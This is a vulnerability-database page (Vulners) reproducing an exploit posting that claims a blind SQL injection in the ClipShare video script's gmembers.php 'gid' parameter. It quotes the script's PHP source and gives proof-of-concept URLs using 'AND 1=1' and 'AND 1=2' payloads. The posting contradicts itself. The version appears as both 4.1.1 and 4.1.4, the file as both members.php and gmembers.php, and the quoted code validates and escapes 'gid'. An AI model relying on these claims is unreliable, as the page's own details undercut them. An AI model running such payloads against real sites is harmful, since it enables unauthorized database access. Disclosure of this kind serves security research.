Vulners
Lucene search
ClipShare 4.1.1 - 'gid' Blind SQL Injection
# Exploit Title: ClipShare 4.1.1 (gmembers.php) Blind SQL Injection Vulnerability
# Exploit Author: Esac
# Vulnerable Software: ClipShare - Video Sharing Community Script 4.1.4
# Official site: http://www.clip-share.com
# Software License: Commercial.
#all versions are vulnerable:
#Note : this vulnerable work just if there is a group added to the community
#Last Checked: 24 March 2013
#to exploit this vulnerability MAGIC_QUOTES_GPC directive must be turned off on server side.(php.ini)
==============================================================================================
#Vulnerable Script:
PHP script : members.php on line 23
=========================== BEGIN OF gmembers.php =============================================
<?php
/************************************************************************************************
| Software Name : ClipShare - Video Sharing Community Script
| Software Author : Clip-Share.Com / ScriptXperts.Com
| Website : http://www.clip-share.com
| E-mail : [email protected]
|**************************************************************************************************
| This source file is subject to the ClipShare End-User License Agreement, available online at:
| http://www.clip-share.com/video-sharing-script-eula.html
| By using this software, you acknowledge having read this Agreement and agree to be bound thereby.
|**************************************************************************************************
| Copyright (c) 2006-2007 Clip-Share.com. All rights reserved.
|**************************************************************************************************/
require('include/config.php');
require('include/function.php');
require('classes/pagination.class.php');
require('language/' .$_SESSION['language']. '/gmembers.lang.php');
$gname = NULL;
$gurl = NULL;
$oid = NULL;
$gid = ( isset($_REQUEST['gid']) && is_numeric($_REQUEST['gid']) ) ? mysql_real_escape_string($_REQUEST['gid']) : NULL;
$sql = "SELECT * FROM group_own WHERE GID='" .$gid. "' limit 1";
$rs = $conn->execute($sql);
if ( $conn->Affected_Rows() == 1 ) {
$urlkey = $rs->fields['gurl'];
$gname = $rs->fields['gname'];
$gupload = $rs->fields['gupload'];
$oid = $rs->fields['OID'];
STemplate::assign('gname', $gname);
STemplate::assign('gurl', $urlkey);
STemplate::assign('gupload', $gupload);
} else {
session_write_close();
header('Location: ' .$config['BASE_URL']. '/error.php?type=group_missing');
die();
}
...........................................;
...............................................
?>
============================================================================================================
Poc :
http://server/mavideo/gmembers.php?gid=6 [Blind SQLi]
Real exploitation :
http://server/mavideo/gmembers.php?gid=6 AND 1=1
==> return normal page
http://server/mavideo/gmembers.php?gid=6 AND 1=2
==> return page with some errors ( or with nothing - white page )
--------------------------------------------------------------------------------------
PwnEd.
Tested version:
Sunday , March 24, 2013 | Version: 4.1.4 | Username: admin | Logout
Copyright © 2006-2008 ClipShare. All rights reserved.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greetz : White Tarbouch Team
./EsacData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
25 Mar 2013 00:00Current
7High risk
Vulners AI Score7